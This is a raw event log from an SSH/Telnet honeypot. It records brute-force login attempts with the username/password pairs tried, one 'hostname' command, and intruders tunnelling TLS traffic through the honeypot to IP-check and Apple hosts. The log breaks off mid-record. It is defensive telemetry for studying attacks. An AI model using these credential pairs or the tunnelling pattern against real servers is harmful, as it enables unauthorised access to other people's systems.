{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:55:32.145975Z","src_ip":"212.227.235.229","session":"1b6bd6e0b670"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:55:32.147154Z","src_ip":"212.227.235.229","session":"1b6bd6e0b670"}
{"eventid":"cowrie.session.closed","duration":120.02172923088074,"message":"Connection lost after 120 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:56:02.400831Z","src_ip":"212.227.125.160","session":"97f55d003924"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41742,"dst_ip":"1.2.3.4","dst_port":22,"session":"deceeb6dfdc0","protocol":"ssh","message":"New connection: 212.227.125.160:41742 (1.2.3.4:22) [session: deceeb6dfdc0]","sensor":"my-vps","timestamp":"2025-08-28T21:56:11.212586Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T21:56:11.213305Z","src_ip":"212.227.125.160","session":"deceeb6dfdc0"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T21:56:11.263503Z","src_ip":"212.227.125.160","session":"deceeb6dfdc0"}
{"eventid":"cowrie.login.failed","username":"solv","password":"solv","message":"login attempt [solv/solv] failed","sensor":"my-vps","timestamp":"2025-08-28T21:56:11.416428Z","src_ip":"212.227.125.160","session":"deceeb6dfdc0"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":53388,"dst_ip":"1.2.3.4","dst_port":22,"session":"fe4878f8e187","protocol":"ssh","message":"New connection: 217.72.205.35:53388 (1.2.3.4:22) [session: fe4878f8e187]","sensor":"my-vps","timestamp":"2025-08-28T21:56:11.997549Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:56:11.998688Z","src_ip":"217.72.205.35","session":"fe4878f8e187"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:56:12.828528Z","src_ip":"212.227.125.160","session":"deceeb6dfdc0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44312,"dst_ip":"1.2.3.4","dst_port":23,"session":"4d75e1fc0878","protocol":"telnet","message":"New connection: 212.227.125.160:44312 (1.2.3.4:23) [session: 4d75e1fc0878]","sensor":"my-vps","timestamp":"2025-08-28T21:56:15.459421Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49766,"dst_ip":"1.2.3.4","dst_port":22,"session":"6f3ddce099b2","protocol":"ssh","message":"New connection: 212.227.125.160:49766 (1.2.3.4:22) [session: 6f3ddce099b2]","sensor":"my-vps","timestamp":"2025-08-28T21:56:15.954548Z"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:56:17.752044Z","src_ip":"212.227.125.160","session":"6f3ddce099b2"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":35340,"dst_ip":"1.2.3.4","dst_port":22,"session":"30cd6e07e462","protocol":"ssh","message":"New connection: 201.148.180.50:35340 (1.2.3.4:22) [session: 30cd6e07e462]","sensor":"my-vps","timestamp":"2025-08-28T21:56:34.872842Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T21:56:36.168465Z","src_ip":"201.148.180.50","session":"30cd6e07e462"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T21:56:36.169198Z","src_ip":"201.148.180.50","session":"30cd6e07e462"}
{"eventid":"cowrie.login.success","username":"root","password":"P","message":"login attempt [root/P] succeeded","sensor":"my-vps","timestamp":"2025-08-28T21:56:43.768282Z","src_ip":"201.148.180.50","session":"30cd6e07e462"}
{"eventid":"cowrie.session.closed","duration":30.64056706428528,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:56:46.099921Z","src_ip":"212.227.125.160","session":"4d75e1fc0878"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T21:56:49.943923Z","src_ip":"201.148.180.50","session":"30cd6e07e462"}
{"eventid":"cowrie.command.input","input":"hostname","message":"CMD: hostname","sensor":"my-vps","timestamp":"2025-08-28T21:56:49.944602Z","src_ip":"201.148.180.50","session":"30cd6e07e462"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","size":13,"shasum":"7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","duplicate":true,"duration":"2.2","message":"Closing TTY Log: var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682 after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:56:52.186720Z","src_ip":"201.148.180.50","session":"30cd6e07e462"}
{"eventid":"cowrie.session.closed","duration":"17.3","message":"Connection lost after 17.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:56:52.187917Z","src_ip":"201.148.180.50","session":"30cd6e07e462"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36056,"dst_ip":"1.2.3.4","dst_port":23,"session":"68fce6b550dd","protocol":"telnet","message":"New connection: 212.227.235.229:36056 (1.2.3.4:23) [session: 68fce6b550dd]","sensor":"my-vps","timestamp":"2025-08-28T21:58:28.094890Z"}
{"eventid":"cowrie.session.connect","src_ip":"1.34.127.84","src_port":49499,"dst_ip":"1.2.3.4","dst_port":23,"session":"bbfcfd9722e7","protocol":"telnet","message":"New connection: 1.34.127.84:49499 (1.2.3.4:23) [session: bbfcfd9722e7]","sensor":"my-vps","timestamp":"2025-08-28T21:58:43.599576Z"}
{"eventid":"cowrie.session.closed","duration":31.460590362548828,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:58:59.555406Z","src_ip":"212.227.235.229","session":"68fce6b550dd"}
{"eventid":"cowrie.session.closed","duration":30.531015396118164,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:59:14.130518Z","src_ip":"1.34.127.84","session":"bbfcfd9722e7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":23102,"dst_ip":"1.2.3.4","dst_port":22,"session":"a18f714b0f9d","protocol":"ssh","message":"New connection: 212.227.235.229:23102 (1.2.3.4:22) [session: a18f714b0f9d]","sensor":"my-vps","timestamp":"2025-08-28T21:59:40.048349Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:59:40.049555Z","src_ip":"212.227.235.229","session":"a18f714b0f9d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":23419,"dst_ip":"1.2.3.4","dst_port":22,"session":"5602a51d610e","protocol":"ssh","message":"New connection: 212.227.235.229:23419 (1.2.3.4:22) [session: 5602a51d610e]","sensor":"my-vps","timestamp":"2025-08-28T21:59:40.182387Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T21:59:40.183386Z","src_ip":"212.227.235.229","session":"5602a51d610e"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-28T21:59:40.318470Z","src_ip":"212.227.235.229","session":"5602a51d610e"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-28T21:59:40.724052Z","src_ip":"212.227.235.229","session":"5602a51d610e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-28T21:59:40.860003Z","session":"5602a51d610e"}
{"eventid":"cowrie.session.connect","src_ip":"185.156.73.233","src_port":44544,"dst_ip":"1.2.3.4","dst_port":22,"session":"5c00897fe554","protocol":"ssh","message":"New connection: 185.156.73.233:44544 (1.2.3.4:22) [session: 5c00897fe554]","sensor":"my-vps","timestamp":"2025-08-28T21:59:41.759991Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_8.4p1 Debian-5+deb11u3","message":"Remote SSH version: SSH-2.0-OpenSSH_8.4p1 Debian-5+deb11u3","sensor":"my-vps","timestamp":"2025-08-28T21:59:41.760646Z","src_ip":"185.156.73.233","session":"5c00897fe554"}
{"eventid":"cowrie.client.kex","hassh":"390ffe68a68c2a2891210413e80689fa","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none,zlib@openssh.com,zlib","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","sk-ecdsa-sha2-nistp256-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","sk-ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","sk-ecdsa-sha2-nistp256@openssh.com","ssh-ed25519","sk-ssh-ed25519@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none","zlib@openssh.com","zlib"],"langCS":[""],"message":"SSH client hassh fingerprint: 390ffe68a68c2a2891210413e80689fa","sensor":"my-vps","timestamp":"2025-08-28T21:59:41.780720Z","src_ip":"185.156.73.233","session":"5c00897fe554"}
{"eventid":"cowrie.login.success","username":"root","password":"Aa123123","message":"login attempt [root/Aa123123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T21:59:41.881379Z","src_ip":"185.156.73.233","session":"5c00897fe554"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"52.49.106.241","dst_port":443,"src_ip":"185.156.73.233","src_port":47550,"message":"direct-tcp connection request to 52.49.106.241:443 from 127.0.0.1:47550","sensor":"my-vps","timestamp":"2025-08-28T21:59:43.480845Z","session":"5c00897fe554"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"52.49.106.241","dst_port":443,"data":"b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\xd3R\\xc6\\xdc\\x972\\x8d-1g\\xc12\\xc7h\\x95\\x94\\xa4@\\xc35N\\x90L\\xf2JZ\\x8a\\r/2\\x00\\x86 1\\x97\\x04\\x9bN\\xef\\xcdH\\xe1\\xdbn&7\\x04\\xab3a\\xe1E\\xc4\\x124\\xcf\\x7f\\x1e<\\xf7\\xc1\\x01\\xbc\\x92\\xea\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x1a\\x00\\x18\\x00\\x00\\x15checkip.amazonaws.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 ?\\xbfA\\xec<\\xca\\xd6%4I?e#\\xea\\x8cV\\x8f8f\\xc0\\xe9\\x1b8\\xcfcct\\xc5\\x98\\x1aK{\\x00\\x15\\x00\\xa1\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","id":0,"message":"discarded direct-tcp forward request 0 to 52.49.106.241:443 with data b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\xd3R\\xc6\\xdc\\x972\\x8d-1g\\xc12\\xc7h\\x95\\x94\\xa4@\\xc35N\\x90L\\xf2JZ\\x8a\\r/2\\x00\\x86 1\\x97\\x04\\x9bN\\xef\\xcdH\\xe1\\xdbn&7\\x04\\xab3a\\xe1E\\xc4\\x124\\xcf\\x7f\\x1e<\\xf7\\xc1\\x01\\xbc\\x92\\xea\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x1a\\x00\\x18\\x00\\x00\\x15checkip.amazonaws.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 ?\\xbfA\\xec<\\xca\\xd6%4I?e#\\xea\\x8cV\\x8f8f\\xc0\\xe9\\x1b8\\xcfcct\\xc5\\x98\\x1aK{\\x00\\x15\\x00\\xa1\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","sensor":"my-vps","timestamp":"2025-08-28T21:59:43.575798Z","src_ip":"185.156.73.233","session":"5c00897fe554"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"184.30.249.36","dst_port":443,"src_ip":"185.156.73.233","src_port":47726,"message":"direct-tcp connection request to 184.30.249.36:443 from 127.0.0.1:47726","sensor":"my-vps","timestamp":"2025-08-28T21:59:43.598612Z","session":"5c00897fe554"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"184.30.249.36","dst_port":443,"data":"b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\x9e\\xe5\\xc7\\\\ZX[\\xddMS\\xf3[\\xe4\\x8f\\x1a\\xa9r\\x02\\x84\\x84M\\xe0k\\xbf@7\\x86\\x1do\\xfd\\x02\\x1e u\\x88\\xc7\\xd1\\x11g*c\\xf9\\xcf\\xd3\\xae\\xfb\\x920wI\\x99\\xe9\\x0bP)\\x7f\\xf7\\x9d.\\x7f&3J\\xbb\\x13\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x12\\x00\\x10\\x00\\x00\\rwww.apple.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\xeb\\xf4\\xd9<\\x8d\\x97JkU\\xf0\\x0bj\\xf5|Q\\xc0_\\x8c\\xa4\\xc5\\x94\\xfd\\xb4\\xfe\\x08\\xfa\\x1eq\\x8a\\xdf\\x86c\\x00\\x15\\x00\\xa9\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","id":1,